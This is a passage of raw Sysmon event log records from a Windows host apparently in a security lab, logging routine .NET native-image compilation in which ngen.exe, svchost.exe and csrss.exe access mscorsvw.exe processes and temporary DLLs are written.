13:27:10.093{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AE-6000-D604-000000009A01}1384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.983{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-DF04-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.921{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-DE04-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.905{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-DE04-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.905{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-DE04-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:11.827{08A6967A-46AF-6000-DD04-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11f0-0\UIAutomationClient.dll2021-01-14 13:27:11.827 10341000x80000000000000008986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.593{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-DD04-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.593{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-DD04-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.593{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-DD04-000000009A01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.515{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-DC04-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.499{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-DC04-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.499{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-DC04-000000009A01}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.390{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-DB04-000000009A01}2452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.374{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-DB04-000000009A01}2452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.374{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-DB04-000000009A01}2452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:11.327{08A6967A-46AF-6000-DA04-000000009A01}4620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\120c-0\System.Xml.Serialization.dll2021-01-14 13:27:11.327 10341000x80000000000000008976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.296{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-DA04-000000009A01}4620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.280{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-DA04-000000009A01}4620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.280{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-DA04-000000009A01}4620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-D904-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.218{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-D904-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.218{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-46AF-6000-D904-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:27:11.171{08A6967A-46AF-6000-D804-000000009A01}3532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dcc-0\System.Xaml.Hosting.dll2021-01-14 13:27:11.171 10341000x80000000000000008969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.077{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-46AF-6000-D804-000000009A01}3532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:11.062{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46AF-6000-D804-000000009A01}3532C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 